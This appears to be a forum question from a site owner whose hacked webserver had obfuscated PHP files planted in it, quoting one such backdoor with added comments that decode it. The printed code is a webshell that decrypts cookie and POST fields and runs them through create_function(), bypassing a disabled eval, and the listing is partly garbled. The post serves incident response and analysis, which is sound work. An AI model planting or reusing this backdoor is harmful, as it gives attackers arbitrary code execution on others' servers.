Somebody hacked my webserver and uploaded many of the following files with random names in different subdirectories of my webroot. The file looks something like this and – even though I managed to beautify it – I am unable to decipher the obfuscation.

I can see that potential code injection is happening using the `$_POST` and `$_COOKIE` variables, but what I find very interesting is the lack of any `eval` calls; the function is even deactivated in my php.ini.

Anyway here’s the code and I’d appreciate any kind of insights:

```
<?php
// Obfuscated PHP backdoor. Analysis comments added for defenders; the code is unchanged.
//
// NOTE(review): the listing is garbled by the page's formatting. `$x(n)` and `$x() =` below were
// almost certainly `$x[n]` (string/array offset) and `$x[] =` (array append), and the quote inside
// the lookup string was presumably escaped (`\'`). Every decoding in these comments assumes that reading.
//
// Summary: each cookie and POST field is hex-decoded, XOR-decrypted with a key derived from the
// field's own name plus a hard-coded constant, split on '#', and, when the number of pieces is a
// multiple of 3, turned into a function with create_function() and executed.
//
// Why no eval(): create_function() compiles its string argument as PHP code, so it gives the same
// capability without the keyword. eval is a language construct, so php.ini's disable_functions does
// not apply to it; create_function is an ordinary function and can be listed there (it was
// deprecated in PHP 7.2 and removed in PHP 8.0).
//
// Response note: these files are the symptom. Deleting them does not close whatever path was used
// to upload them, and any request that reached one of them could have run arbitrary PHP.

// 35-character lookup table; every name used below is spelled by picking characters out of it.
$wldxznb = 'r5a3m#uvplebgsH'co*6i8-_7tx14nfk0yd';
$vcekj = Array();
// [0] => "create_function"
$vcekj() = $wldxznb(16) . $wldxznb(0) . $wldxznb(10) . $wldxznb(2) . $wldxznb(25) . $wldxznb(10) . $wldxznb(23) . $wldxznb(30) . $wldxznb(6) . $wldxznb(29) . $wldxznb(16) . $wldxznb(25) . $wldxznb(20) . $wldxznb(17) . $wldxznb(29);
// [1] => "H*" (pack() format: hex string, high nibble first)
$vcekj() = $wldxznb(14) . $wldxznb(18);
// [2] => a 36-character UUID-shaped constant (hex digits and dashes), appended to the field name as key material
$vcekj() = $wldxznb(1) . $wldxznb(16) . $wldxznb(21) . $wldxznb(30) . $wldxznb(10) . $wldxznb(34) . $wldxznb(10) . $wldxznb(16) . $wldxznb(22) . $wldxznb(10) . $wldxznb(21) . $wldxznb(27) . $wldxznb(32) . $wldxznb(22) . $wldxznb(28) . $wldxznb(30) . $wldxznb(16) . $wldxznb(2) . $wldxznb(22) . $wldxznb(11) . $wldxznb(11) . $wldxznb(27) . $wldxznb(19) . $wldxznb(22) . $wldxznb(3) . $wldxznb(27) . $wldxznb(1) . $wldxznb(11) . $wldxznb(28) . $wldxznb(34) . $wldxznb(34) . $wldxznb(24) . $wldxznb(2) . $wldxznb(34) . $wldxznb(19) . $wldxznb(34);
// [3] => "#" (field separator inside the decrypted payload)
$vcekj() = $wldxznb(5);
// [4] => "count"
$vcekj() = $wldxznb(16) . $wldxznb(17) . $wldxznb(6) . $wldxznb(29) . $wldxznb(25);
// [5] => "str_repeat"
$vcekj() = $wldxznb(13) . $wldxznb(25) . $wldxznb(0) . $wldxznb(23) . $wldxznb(0) . $wldxznb(10) . $wldxznb(8) . $wldxznb(10) . $wldxznb(2) . $wldxznb(25);
// [6] => "explode"
$vcekj() = $wldxznb(10) . $wldxznb(26) . $wldxznb(8) . $wldxznb(9) . $wldxznb(17) . $wldxznb(34) . $wldxznb(10);
// [7] => "substr"
$vcekj() = $wldxznb(13) . $wldxznb(6) . $wldxznb(11) . $wldxznb(13) . $wldxznb(25) . $wldxznb(0);
// [8] => "array_merge"
$vcekj() = $wldxznb(2) . $wldxznb(0) . $wldxznb(0) . $wldxznb(2) . $wldxznb(33) . $wldxznb(23) . $wldxznb(4) . $wldxznb(10) . $wldxznb(0) . $wldxznb(12) . $wldxznb(10);
// [9] => "strlen"
$vcekj() = $wldxznb(13) . $wldxznb(25) . $wldxznb(0) . $wldxznb(9) . $wldxznb(10) . $wldxznb(29);
// [10] => "pack"
$vcekj() = $wldxznb(8) . $wldxznb(2) . $wldxznb(16) . $wldxznb(31);
// array_merge($_COOKIE, $_POST): every cookie and POST field is tried as a possible command carrier.
// $wxusr is the field name, $pjrusp its value.
foreach ($vcekj(8)($_COOKIE, $_POST) as $wxusr => $pjrusp)
{
// NOTE(review): the three functions are declared inside the loop body, so a second iteration
// would likely stop with a "Cannot redeclare" fatal error; that message in the PHP error log is
// a possible sign that one of these files was requested.
/**
 * Builds the XOR keystream: repeats (field name . constant [2]) with str_repeat() and cuts the
 * result to $qwdotr bytes with substr().
 */
function wwdlf($vcekj, $wxusr, $qwdotr)
{
return $vcekj(7)($vcekj(5)($wxusr . $vcekj(2), ($qwdotr / $vcekj(9)($wxusr)) + 1) , 0, $qwdotr);
}
/**
 * Hex-decodes a field value with pack("H*", ...). The @ suppresses the warning pack() raises on
 * input that is not valid hex.
 */
function irngfrj($vcekj, $axsex)
{
return @$vcekj(10)($vcekj(1), $axsex);
}
/**
 * Execution stage. $axsex is the decrypted payload already split on "#".
 * Does nothing unless count($axsex) is a multiple of 3.
 */
function vadod($vcekj, $axsex)
{
$onlwwe = $vcekj(4)($axsex) % 3;
if (!$onlwwe)
{
$zznqw = $vcekj(0);
// Piece 1 is called as a function name with piece 2 as its argument; the return value becomes
// the body of a new zero-argument function made by create_function().
$juptpoi = $zznqw("", $axsex(1)($axsex(2)));
// Runs the request-supplied code, then ends the request so the remaining fields are not processed.
$juptpoi();
exit();
}
}
// Hex-decode the field value ...
$pjrusp = irngfrj($vcekj, $pjrusp);
// ... XOR it with a keystream of the same length, split the result on "#", and hand it to the
// execution stage.
vadod($vcekj, $vcekj(6)($vcekj(3), $pjrusp ^ wwdlf($vcekj, $wxusr, $vcekj(9)($pjrusp))));
}
```